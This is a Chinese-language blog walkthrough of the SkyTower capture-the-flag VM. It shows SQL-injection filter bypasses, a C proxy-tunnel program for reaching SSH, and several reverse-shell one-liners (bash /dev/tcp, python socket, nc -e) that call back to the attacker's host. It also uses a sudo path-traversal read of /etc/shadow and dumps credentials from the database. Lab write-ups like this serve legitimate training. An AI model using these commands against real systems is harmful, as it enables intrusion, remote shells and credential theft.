一、主机发现+信息收集
arp-scan -l
环境变量设置
export ip=192.168.2.193
端口扫描
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE 22/tcp filtered ssh 80/tcp open http 3128/tcp open squid-http MAC Address: 00:0C:29:A7:0A:46 (VMware)
服务信息收集
nmap -sS -sV -O -p22,80,3128 $ip
PORT STATE SERVICE VERSION 22/tcp filtered ssh 80/tcp open http Apache httpd 2.2.22 ((Debian)) 3128/tcp open http-proxy Squid http proxy 3.1.20 MAC Address: 00:0C:29:A7:0A:46 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.2 - 3.16 Network Distance: 1 hop
默认脚本扫描
nmap --script=vuln -p22,80,3128 $ip
PORT STATE SERVICE 22/tcp filtered ssh 80/tcp open http |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_http-dombased-xss: Couldn't find any DOM based XSS. | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=bogon | Found the following possible CSRF vulnerabilities: | | Path: http://bogon:80/ | Form id: |_ Form action: login.php 3128/tcp open squid-http MAC Address: 00:0C:29:A7:0A:46 (VMware)
二、开始渗透
80端口Web应用
初步访问发现是一个登录界面
随意输入
123'
12
发现存在SQL注入
有SQL注入就要尝试万能密码登录
123' or 1=1 --+
1
根据上面的信息表示 是把 = -- 过滤掉了
其中=我们可以用LIKE进行替代
-- 注释符 我们可以用# 进行替代
可以发现= --已经替换成功但是还是报错,是or也别过滤掉了,我们这里尝试双写绕过 oorr
登录成功,我们得到了一组账号密码
john
hereisjohn
拿我们就尝试一下22端口的ssh登录
ssh john@192.168.2.193
但是被过滤掉了,我们发现我们还有一个3128端口的代理服务没用
curl -x http://192.168.2.193:3128 http://192.168.2.193
我们使用curl挂上这个代理访问一下这个Web
目录爆破(+挂上代理爆破目录)
正常目录爆破
gobuster dir -u http://192.168.2.193/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
或 dirsearch -u http://192.168.2.193
挂代理目录爆破
dirsearch -u http://192.168.2.193/ -e * --proxy http://192.168.2.193:3128
都是一样的结果
尝试通过代理进行ssh连接
1. 编辑 connect.c 脚本
connect.c 脚本可以帮助我们通过 HTTP 代理建立 TCP 连接
内容如下
int main(int argc, char *argv[]) {
int sockfd, portno, n;
struct sockaddr_in serv_addr;
struct hostent *server;
char buffer[BUFSIZE];
if (argc!= 5 || strcmp(argv[1], "-H")!= 0) {
fprintf(stderr, "Usage: %s -H proxyhost:proxyport targethost targetport\n", argv[0]);
exit(0);
}
char *proxyhost = strtok(argv[2], ":");
char *proxyport_str = strtok(NULL, ":");
if (proxyhost == NULL || proxyport_str == NULL) {
fprintf(stderr, "Invalid proxy specification\n");
exit(1);
}
portno = atoi(proxyport_str);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0) {
perror("ERROR opening socket");
exit(1);
}
server = gethostbyname(proxyhost);
if (server == NULL) {
fprintf(stderr, "ERROR, no such host as %s\n", proxyhost);
exit(0);
}
bzero((char *)&serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
bcopy((char *)server->h_addr, (char *)&serv_addr.sin_addr.s_addr, server->h_length);
serv_addr.sin_port = htons(portno);
if (connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
perror("ERROR connecting");
exit(1);
}
snprintf(buffer, BUFSIZE, "CONNECT %s:%s HTTP/1.0\r\n\r\n", argv[3], argv[4]);
n = write(sockfd, buffer, strlen(buffer));
if (n < 0) {
perror("ERROR writing to socket");
exit(1);
}
bzero(buffer, BUFSIZE);
n = read(sockfd, buffer, BUFSIZE - 1);
if (n < 0) {
perror("ERROR reading from socket");
exit(1);
}
if (strncmp(buffer, "HTTP/1.0 200", 10)!= 0) {
fprintf(stderr, "Proxy connection failed: %s\n", buffer);
exit(1);
}
int pid = fork();
if (pid == 0) {
// Child process: copy stdin to socket
while ((n = read(0, buffer, BUFSIZE)) > 0) {
write(sockfd, buffer, n);
}
close(sockfd);
exit(0);
} else {
// Parent process: copy socket to stdout
while ((n = read(sockfd, buffer, BUFSIZE)) > 0) {
write(1, buffer, n);
}
close(sockfd);
kill(pid, SIGTERM);
exit(0);
}
}
GCC编译
gcc -o connect connect.c
2. 通过代理连接 SSH
使用 nc 和 connect 脚本建立 SSH 连接:
ssh john@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p"
OK了,通过代理我们就不被过滤了
但是这里连接成功但是又断开了 ,可能是代理层使用的不稳定
ssh john@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p" id
没事儿,可以执行命令就行,我们利用这个反弹一个可交互shell
三、获得初始权限
在ssh连接命令后面加上反弹shell命令
ssh john@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p" 'bash -i >& /dev/tcp/192.168.2.128/4444 0>&1'
bash -i 被禁了,换其他的
ssh john@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p" 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);"'
没python,接着换
有nc使用nc连接成功了
ssh john@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p" 'nc 192.168.2.128 4444 -e /bin/sh'
四、提权
cd ~
ls -liah
发现用户下有个.bashrc
cat 查看
原来连上断是因为最后一个exit命令
cd /var/www
cat login.php
发现了mysqli数据库账号
但是我们现在的shell是非交互的,我们需要先提升一下
还是先返回到john用户目录下,我们将最后一个exit命令删除
cd ~
sed -i '$d' .bashrc
然后重新使用ssh进行john连接
ssh john@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p"
MySQL登录
mysql -u root -p
密码root
SHOW DATABASES; 不要忘记后面的分号,因为忘了输入了好几次
USE SkyTech;
SHOW TABLES;
select * from login;
+----+---------------------+--------------+ | id | email | password | +----+---------------------+--------------+ | 1 | john@skytech.com | hereisjohn | | 2 | sara@skytech.com | ihatethisjob | | 3 | william@skytech.com | senseable | +----+---------------------+--------------+
john@SkyTower:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false john:x:1000:1000:john,,,:/home/john:/bin/bash sara:x:1001:1001:,,,:/home/sara:/bin/bash william:x:1002:1002:,,,:/home/william:/bin/bash
这里对应了三个用户 sara ihatethisjob
william senseable
使用su user命令切换用户,发现行不通
那就还跟刚才的方法一样,先用/bin/bash进去,然后给文件中的exit删掉
ssh sara@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p" /bin/bash
sed -i '$d' .bashrc
Ctrl+C 退出,然后ssh命令重新登录
ssh sara@192.168.2.193 -o ProxyCommand="./connect -H 192.168.2.193:3128 %h %p"
sudo -l
sudo su 这个还不是最终的用户
那就只剩一个william了
我们发现这个用户在/accounts/* 目录中有root权限使用cat
那我们就可以使用上级目录大法查看/etc/shadow文件了
sudo cat /accounts/../etc/shadow
john:$6$a39powbs$ditVKZ1waa6vJEh3BG1d5jLv/uADKcl.r1kcA.XKyhNfJoiDhSdwmSZel3V5cZ/S6ec3wd8rdNA2dOznTXhl0/:16198:0:99999:7::: sara:$6$2PvpHNG0$hbaMRd5fZhWMDHyyhGHINSy.qBHnvP4QW1k9RSwv.pQM6SoZey53C7S7aF6263ae6qx5TwVA6sahf5tebUqvY1:16198:0:99999:7::: william:$6$c3VykdoT$qRUKl1e77skTm0sLHavRSp8mUJfMIPrJBovrXC8o9GY8/P7gpasSbvtqA0rn9.HyxjKhSVji8/CzHNFLit3GU1:16241:0:99999:7:::
但是都是加了盐的哈希,难道只能爆破了吗
我们先利用这个方法看看其他信息
sudo cat /accounts/../root/flag.txt
sara@SkyTower:/$ sudo cat /accounts/../root/flag.txt Congratz, have a cold one to celebrate! root password is theskytower
OK,找到了密码
su 切换root用户
密码: theskytower
五、提权成功
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:https://www.oneblanks.xyz/skytower%e9%9d%b6%e6%9c%ba%e7%bb%83%e4%b9%a0/
共有 0 条评论